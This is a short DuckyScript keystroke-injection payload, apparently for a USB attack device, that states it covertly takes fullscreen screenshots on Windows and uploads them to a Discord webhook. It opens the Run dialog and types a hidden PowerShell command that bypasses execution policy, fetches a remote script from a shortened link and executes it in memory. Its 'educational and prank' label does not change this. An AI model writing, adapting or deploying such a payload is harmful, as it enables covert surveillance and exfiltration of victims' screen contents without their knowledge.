REM ┌─────────────────────────────────────────────────────┐
REM │ hooker01 | github.com/hooker01                      │
REM │ Description: Periodically captures fullscreen       │
REM │              screenshots and uploads them to a      │
REM │              specified Discord webhook URL.         │
REM │ Note: Replace 'WEBHOOK_LINK' with your webhook.     │
REM │ Purpose: Educational and prank use only.            │
REM │ Target: Windows 10/11                               │
REM └─────────────────────────────────────────────────────┘


DELAY 400
GUI r
DELAY 750
STRING powershell -NoP -Ep Bypass -W H -C $dc='WEBHOOK_LINK'; irm https://is.gd/BIDtyK | iex
ENTER
